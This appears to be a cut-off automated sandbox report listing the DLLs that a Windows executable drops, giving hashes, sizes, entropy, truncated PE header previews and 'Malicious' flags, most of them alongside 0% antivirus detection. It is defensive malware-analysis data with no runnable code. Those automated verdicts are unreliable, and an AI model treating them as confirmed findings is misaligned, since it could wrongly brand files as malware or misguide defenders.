                                                                                      SHA-512:7C4047D0F1708312AA9E9CB3F2466746E1F571E4A93AC90C6BCA58004951B64E974A6248756ABC4A55AFFB99511C6FF9DA087F9EF8E2B921FC6AF9BB581BAC4D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L..................!......................... ...............................@......o.....@.........................`...v............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12752
                                                                                      Entropy (8bit):6.621070064200597
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8oWKIMFIWBhWhWYnO/VWQ4mW17VgoqnajKs0Vnkmli:8JtWBhWhUmVnlGs0Vnk9
                                                                                      MD5:B15827E6DA414B0EAF28983A032CDE60
                                                                                      SHA1:429647AEC3681BA91FE2944490C212C05CEF5F51
                                                                                      SHA-256:AD14B0E3EB3CE3CFDBA79A68A8064EDB62A11FBE354833345C4AE6126E743907
                                                                                      SHA-512:418813A8C845777E2116871ED1C9039B69BB34938D9E9E85752539E9DF6CCE9B3B21463CDA77D8BCB2AE88625410B2B4D20E1D7EE40624CBA7F0DC057D01D2EB
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L....e7<...........!......................... ...............................@......W.....@.........................`...E............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.711717221941304
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:wyqLWBhWeWYnO/VWQ4mWjxQeyW4EHsqnajKse3pAQ:wyqLWBhWEUDW4UslGse3D
                                                                                      MD5:4C55353E8F13BBF2DEA1F11CE7D34B79
                                                                                      SHA1:6EA85FDA4231ED7DC537D0C0DFB36F25CB00A190
                                                                                      SHA-256:3EF9C1B03931B54E98D6426822A634378A64754CB8FB509DF20B8C8072DD8F83
                                                                                      SHA-512:ED0EF686668A80207AE644F8396D873457FF23D5D6E24B6E1FF87B4BE632A65224AF987A411B9FB3F9FDB197C456B71C6590AC8C2FDC823787F76798D1A7ADDE
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...u..............!......................... ...............................@...........@.........................`...E............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11728
                                                                                      Entropy (8bit):6.640499789236732
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:zWBhWiWYnO/VWQ4mWQR4LrMhEqnajKsZ9Alw:zWBhWYUajlGsZN
                                                                                      MD5:4E8F314A1FC6A6EF9CAC0B9A0C4A67FC
                                                                                      SHA1:700A6771D874A96B0B4C287ECE399C98A012B6F1
                                                                                      SHA-256:BBAA4FD9157D92DBE443CB6C9BD51D2E88D1497DC852ADD6B5D06E462FC599C5
                                                                                      SHA-512:53DFFD2354D438420587E1C53267739343E04A7D8D6A29F02867F3571A5064DF04B9B082D8835D9C174BAC85D01B7B3A699542BE41C70503BB7641028287DD8C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L....v.............!......................... ...............................@......(I....@.........................`...9............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12752
                                                                                      Entropy (8bit):6.646138241902779
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:FnYm2WBhWCWYnO/VWQ4mWt4goqnajKs0VIl:6WBhW4UznlGs0VY
                                                                                      MD5:5BABFCDBE7E6A051CBB46E92D2B1D374
                                                                                      SHA1:9DFEC59A4DAC8F2B428B0E5F680983182C75F9EC
                                                                                      SHA-256:A57A01F9466F3152B17F03A1E66D7D394AEB0EDBE8F9CD8CC49B4334994B831D
                                                                                      SHA-512:F1EF6E61C6639FD116F4D512AAEEE4F3F0A8B33453B0AE33B735949FE7BE047B3DDD8EB1483A328E5936D977A137E510815E7EFB376767C7505F3D2AA3AE0729
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...U..r...........!......................... ...............................@............@.........................`................0...................!..............T............................................................................text...P........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):15840
                                                                                      Entropy (8bit):6.454026885121232
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:rT7cyZWBhWDWYnO/VWQ4SWS3+RJMvN/qnajxg8fS:rTgyZWBhWDUU6/lNvq
                                                                                      MD5:E28F70E327F9B4926D6484DC1A159C94
                                                                                      SHA1:FDA05D5E0562083801966B3F962D265A6A8855E2
                                                                                      SHA-256:DABCCCC0F209E83D80024CD063D4E16D2CA2478B483E33DB7CFF40976C3C993C
                                                                                      SHA-512:89B3B1F65137BF2400C784B934FCD0349BA00675902B2FE48971246E6E1C99423A3B5ADADA797753A7A6F35F50AD980A8404D5A18CFC3606B5CC52B278FB13A0
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L..................!.........................0...............................P......,.....@.........................p................@...................!..............T............................................................................text...^........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.618891411839505
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1odpWBhWlWYnO/VWQ4mWRoh14EHsqnajKse3pV/R:16pWBhWVUxh14UslGse31
                                                                                      MD5:06B191B4F4A1F1FB86BD826AC5F48C2C
                                                                                      SHA1:B7B454CA07B984FB74C756E60BC4EAE0BC6991A6
                                                                                      SHA-256:6666E2FAE294C82EAE55B33B6C4A61463DCA84C4B411E03326A71FDE333B519D
                                                                                      SHA-512:638856717A5DB0E5BACEBA54CF596718C661420C4985DD279A78D42095CADD64527DD2214F0D4E35DE7AB4D531444FEE2CAF5F5941D32C28878FEE2C3B67CB8F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L.....\............!......................... ...............................@............@.........................p..."............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):14288
                                                                                      Entropy (8bit):6.515762527300964
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bnWlC0i5ChWBhWnnWYnO/VWQ4mW68BAUOgoqnajKs0V3:bnWm5ChWBhWnXUDpnlGs0V3
                                                                                      MD5:499F30D39C72E8620A30BC4E0C7985EC
                                                                                      SHA1:D57FE510B27C16FBC11BB2042333894ACB5914E2
                                                                                      SHA-256:A4EE1A6246A4C0612F12901298323612AD4C738429D14075942329CB5AC807DD
                                                                                      SHA-512:8DB7E3B17474A1462A99E19BB35690B966424EEDD632455AC00DAFA9CC46569BD6E081C36DA52B9C78237A85493C7ABF217D6C3A69098C73BD8C18633B4A760C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L.....f............!......................... ...............................@.......-....@.........................p................0...................!..............T............................................................................text... ........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12752
                                                                                      Entropy (8bit):6.59337335302922
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:reY17aFBR8WBhWjWYnO/VWQ4mW3pUnLrMhEqnajKsZ9bx:rzZWBhWjUKUnjlGsZT
                                                                                      MD5:A77F681BE0EFA335EAFC0C5175CCEDAD
                                                                                      SHA1:511D3078D142C672FEBF012BED412660F88299A3
                                                                                      SHA-256:434C2CE6CF4E61BB4273C7EFB39565445383CF77A8BEE79C41FFEB5315B6F285
                                                                                      SHA-512:12C440B9AC908E934BC419A520E2BC8697E42CCC438B46AAC34CE98AEFE816FA18D1F3073C01D59B65FE21AFC65435B27B6D3398BF5361B68DC30630FA4C6C07
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L.....-)...........!......................... ...............................@......d.....@.........................`................0...................!..............T............................................................................text...v........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.717763097244974
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:YxZJ2WBhWQWYnO/VWQ4mWZG71LrMhEqnajKsZ9Ron:YxZMWBhW+UNjlGsZe
                                                                                      MD5:0B688C4FCE6D07018D443C1B3BFFB3D0
                                                                                      SHA1:0F2CF0F20FE7CFAF7F8F27E7AD7D5E1871316756
                                                                                      SHA-256:FB22B002939BB699BFA1F25B3B4C96E71CB5A737183ABC79A03A22C6D517A1A5
                                                                                      SHA-512:1F555158A1D98624EF32293B3078F4CC20B1107157E2B48E36D324837151961085275FDD581081FE1E0D62EDCF02197C57FDAE972EA20378BD3E4F84B99BFD3B
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L.................!......................... ...............................@............@.........................p...e............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22480
                                                                                      Entropy (8bit):6.202005954734633
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:fQF2KmbM4Oe5grykfIgTmLuWBhW3UnjlGsZN:ftMq5grxfInR09I
                                                                                      MD5:547E74027B6DB8C65BBEE2707335CDC4
                                                                                      SHA1:C7CE2446BF4DC38D72EF115BA67086C4F121C7E8
                                                                                      SHA-256:35E617878BF8B927DF3387C5BDAA4BA94309C7AFB0F901C6A53326C3CC97FB15
                                                                                      SHA-512:6BD92F9C3DD20B75FC18DE1A88C82FAC4D49B81B652A7DAE109AB64DF5F109E9BBF9842C2BED2148D24368B2F9BE82FB86A824032C073CE37C61C657EDE74BD9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...h>.............!.........................@...............................`............@.........................`....+...........P...............6...!..............T............................................................................text...7-.......................... ..`.data...@....@......................@....rsrc........P.......2..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19920
                                                                                      Entropy (8bit):6.204292997926146
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:/7aLPmIHJI6/CpG3t2G3t4odXLtWBhW+Upz4UslGse3PG:jwPmIHJI6OhUS
                                                                                      MD5:5A82F00442E6C0558687E4C8FFE8D00C
                                                                                      SHA1:98794532EDD7627D8D4EDDD064D314C2681F8E78
                                                                                      SHA-256:559286B7F6B575E7AD881824364D5F1790669917C55EB6AA073DB0B9068AEF78
                                                                                      SHA-512:6CEDAE2F524AE6CFD16896653957431E8D4647050EC405977CD957E8B8E2CB120E525CC16BAF7382DF7E5048DBB574EE509481E7F11477462B5AB0AFAC89349F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...r"A............!.....$...................@...............................`......#.....@.........................p.... ...........P...............,...!..............T............................................................................text...d".......$.................. ..`.data...@....@......................@....rsrc........P.......(..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):66512
                                                                                      Entropy (8bit):5.530731860428242
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:V8tbDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPgynT:qtDe5c4bFE2Jy2cvxXWpD9d3334BkZnA
                                                                                      MD5:A407FC4E6705A7FFA7CDD8264266FBE4
                                                                                      SHA1:7DAD59D1A1A626A483E1EAFB839E9859CA99C6F5
                                                                                      SHA-256:BE86CF37B09C08EC4EB3CF7E8403C7BB86EE80441323906D0DDACC884F3C79E4
                                                                                      SHA-512:E8BE910F4BDAF997838F783668457A207D990E40D62C145E7387049B1F81D21299A10B91E141307630A792D0CA226F8235D311263DBBA8493829B82E547F6932
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L....m.............!.................................................................\....@.........................p....................................!..............T............................................................................text............................... ..`.data...@...........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12752
                                                                                      Entropy (8bit):6.618753441548937
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:4kW9wF5uSqjd75WBhWUWYnO/VWQ4mWGxVyILrMhEqnajKsZ9h16boE:4rcuSYWBhWCU5jlGsZPcP
                                                                                      MD5:80A4CBB957D7222EE43917B149E93C53
                                                                                      SHA1:01603F8F1642D624BBA3BD45C5D73D9D10001BE4
                                                                                      SHA-256:C24FDFD9BA4701BFFB2AD840FFE315CD807BEEA6748B97835E0675C35DD13F47
                                                                                      SHA-512:9C981D3EF9FC22D4C459A0139621D6DACC43A6C343462FE71A0BF885C3258184A6C4F4AB11B8E1429C11319FC0401BA6EB64E50B4629DA94D177165BC44639E1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...*4.............!......................... ...............................@...........@.........................p...x............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):16848
                                                                                      Entropy (8bit):6.37698990107166
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:O9DMjOOfhrpIhhf4AN5/jifWBhWGWYnO/VWQ4mWHQx4EHsqnajKse3pJV:O9ojOShrKkWBhWsUL4UslGse3Z
                                                                                      MD5:898F86B6B29142428E92956F9043FCB5
                                                                                      SHA1:89970BCA1287CD9A28AF90B1C7E61CFAD6F8D716
                                                                                      SHA-256:7D6F4E5C3AC9DC87FC962F515A0173D75718DA6B6FFCFF4F9255C109E7FE7A18
                                                                                      SHA-512:A5444063C70A790EE9A339EF45644704CE75824D007F90CFA570C7C3E8DEB0DD7852A9F7B97CF0AA82AAE05D6FC0CDAF618DF9BB7BDADF39B6DC609A40F2C363
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...z).............!.........................0...............................P...........@.........................p................@............... ...!..............T............................................................................text...5........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):17872
                                                                                      Entropy (8bit):6.410004360781716
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:/y4x+m9uWYFxEpahfWBhWzWYnO/VWQ4mWLw+LvtugoqnajKs0VvY:xx+tFVhfWBhWzUuv0nlGs0VA
                                                                                      MD5:4D46C692A087DAD81BEEC8211F67F4A3
                                                                                      SHA1:DEA942FF2135EE50FC45861D7D6F9CBD8817316B
                                                                                      SHA-256:DD4A1885415CF5C37471B18FBD9211E0B4887D0456A3320D0213FDDC4209E66D
                                                                                      SHA-512:D48FECDC6179C193349934F3D14A1C5196F832364F89EDEADC55329CA6E4899D49659B87EF6C06ED741012F96F10FD5C8B04497411E95880728FDCB79DC61558
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...*..............!.........................0...............................P............@.........................`...a............@...............$...!..............T............................................................................text............................... ..`.data...@....0......................@....rsrc........@....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18392
                                                                                      Entropy (8bit):6.292455454608518
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:7KgSx0C5yguNvZ5VQgx3SbwA7yMVIkFGl7WBhWSUesln8ppy:Gx5yguNvZ5VQgx3SbwA71IkF19dvy
                                                                                      MD5:C3F7F531A0F4A3BC4DEF8191803336D3
                                                                                      SHA1:68DCC28EE07004823C1ADDD65C478ADA06A8708E
                                                                                      SHA-256:DCF381E5995FA69E3902A3F49464EC5A35F9E78A55444B24F49717512FD37372
                                                                                      SHA-512:7784AAD3546620D9EB802C65D50DFAB4AA32F15D32B8D71F16D92E5446394F9B521527668E547C3EFDDB959DDEDEB623A880975CB0751FE1B58BEF94689B71FD
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L......b...........!.........................0...............................P......@.....@.........................p................@...............&...!..............T............................................................................text...O........................... ..`.data...@....0......................@....rsrc........@......."..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):14304
                                                                                      Entropy (8bit):6.557683602083814
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:IugzjVDuWBhWlyWYnO/VWQ4eWuya4jqqnajN6z1zX:IuA8WBhWloU00lp6z1z
                                                                                      MD5:AE8E8A8CCDDD31C6E93C23D66CC2C7CE
                                                                                      SHA1:E49D67BF5B5E5A1B5F2564603AF59523305AD3C1
                                                                                      SHA-256:66E10B3EAFB86BD0B31C3AA494DE64F01B9908B90022D1C6577FD639C337CDD0
                                                                                      SHA-512:F85D2ADD7EAEFB2D49D0E776720DB659587DC884D943339DE8F95354C965F86D36D06A3DE81EF5673EB18BF0E84F660B76EB19BF4EEA73BDD51A497C2ABA85E6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L......D...........!......................... ...............................@......VK....@.........................`................0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.694309765478122
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:cCnfHQduLWBhWpWYnO/VWQ4WW6SbgoqnajKs0V6f3:cgfFWBhWpUAbnlGs0VI
                                                                                      MD5:23555460EB85D497549C959179118690
                                                                                      SHA1:704E67C82FCD099E36958429EA65C24DBB4728AA
                                                                                      SHA-256:C4073E7FEFDBD189C61F63A6C8AFD169F35E2272B035ED49B6517419CC7114D9
                                                                                      SHA-512:8151BBDF18A420B5B5E7CBD4F3C3D66100469088986FC4FFA893F1DE2E850FEF1FD1E2F674057130336C3FB4E0215008CF6FFEE4164BC1DC5E87BEF6B79E73C8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...f.>L...........!......................... ...............................@............@.........................p...^............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):249600
                                                                                      Entropy (8bit):6.670542659357178
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:vGh9nrxRw13UyU2G8g1QYYZTDt3n2x+Bdv5zsSiBsTYrPlUEYD/QzkRWAFcUv12W:4InTDtXF15zsSiyZ/0UkzcP
                                                                                      MD5:8651E6272E310D5C64D0C91CA975B029
                                                                                      SHA1:0E2433C8771AC420B5684C79E96EB7E206350757
                                                                                      SHA-256:B721897DB5542D5B0C970EC624440442ED9AE781E55147FEB9FF264F70F66CDE
                                                                                      SHA-512:D99D049B9AE9F7BCF9E6737B26A90F544A08FF49E06FDC39617B869EB97676024E18BA42E680DB255A8A04F323DE494DD8E7B706007E9B961C78A64CDF078FF6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......uc.&1..u1..u1..u...u3..u8ziu;..ucj.t4..u1..u...ucj.t:..ucj.t6..ucj.t`..ucj.t0..ucj.u0..ucj.t0..uRich1..u................PE..L....(.[.........."!.........v...............0......................................>9....@A........................`....K..(b...........................?......P,.. <..8...........................X<..@............`..$............................text............................... ..`.data........0...,..................@....idata.......`.......J..............@..@.rsrc................\..............@..@.reloc..P,...........b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):31560
                                                                                      Entropy (8bit):6.790050488943384
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:QGExrZKvjTGz9ToqsggkJoW3ICVlJzYCpDE0k1HLZSf+VIYiY99PyIDPxh8E9VFH:oqHKNgkxtECpRk5i/Yik9PNPxWEzV
                                                                                      MD5:55AF0FE3D4A55A885DF43E45BD5801F6
                                                                                      SHA1:DB6294598BEA9EC514EC9C35190756A700160144
                                                                                      SHA-256:6B4A3CCA7972388F74DDE71F85EDA2AD52C504E6C74480B39FFCADDD1095A6C2
                                                                                      SHA-512:464EDA6B132C15837492278B516D24317C7BCD5FE80A354A39995AC65B9EA893ADED3E0498557AEE70A9DA1240566C1155AE43327CBE4E2FCAF360EC34A2E2CE
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................................O.....H.....X..........................4.....\...........Rich....................PE..L...)..b...........!.........&......a!.......0......................................uz....@......................... =..X...x=.......`...............F..H5...p.......2..T............................3..@............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):147784
                                                                                      Entropy (8bit):6.973886751449692
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:fej6V+b2IVnMaw+etXO5jQhdSzBuOgFzwVRrynw5PNTBfXRqgDq/YExr:feWV+b3pwFXyQOMOgiVRrynw5PNTBfRK
                                                                                      MD5:98F0988C3CF0987A32472B16C8AD2B49
                                                                                      SHA1:4B9CBFCE4286C71D371674C903CB37C853EA69A6
